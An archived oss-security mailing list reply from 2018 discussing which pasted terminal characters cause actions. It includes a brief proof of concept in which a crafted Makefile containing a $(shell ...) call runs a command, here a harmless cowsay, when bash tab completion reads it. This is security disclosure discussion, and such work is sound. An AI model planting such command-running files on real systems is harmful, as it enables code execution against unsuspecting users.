[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: Re: [oss-security] Re: Terminal Control Chars
From: Jakub Wilk <jwilk () jwilk ! net>
Date: 2018-04-16 8:15:00
Message-ID: 20180416081500.4dnup7bk3g6vkkaa () jwilk ! net
[Download RAW message or body]
* David A. Wheeler <dwheeler@dwheeler.com>, 2018-04-12, 17:18:
>Russ Allbery:
>>I think a useful definition of "control character" in this context
>>(and I realize this doesn't exactly match the ASCII definition) is a
>>character that results in an action other than insertion being
>>taken... CR and LF would not be control characters in that definition,
>>since they insert a newline and don't cause an action. Similarly, TAB
>>wouldn't be a control character in that definition.
>
>As you noted, that definition doesn't match the ASCII definition, but I
>also think it's misleading. If someone pastes a CR/LF into a shell
>prompt, it certainly *DOES* cause an action,
Similarly, tab is an "active" character in most shells.
In the worst case (the victim uses bash with bash-completion installed,
and the attacker has write access to the victim's filesystem), pasting
tab can be as bad as pasting LF.
Here's a proof of concept:
$ printf 'x := $(shell (echo; cowsay pwned)>/dev/tty)' > moo
$ make -f moo <tab>
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
Credit for discovering this goes to Dan Rosenberg:
https://twitter.com/djrbliss/status/699363006946344963
--
Jakub Wilk
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic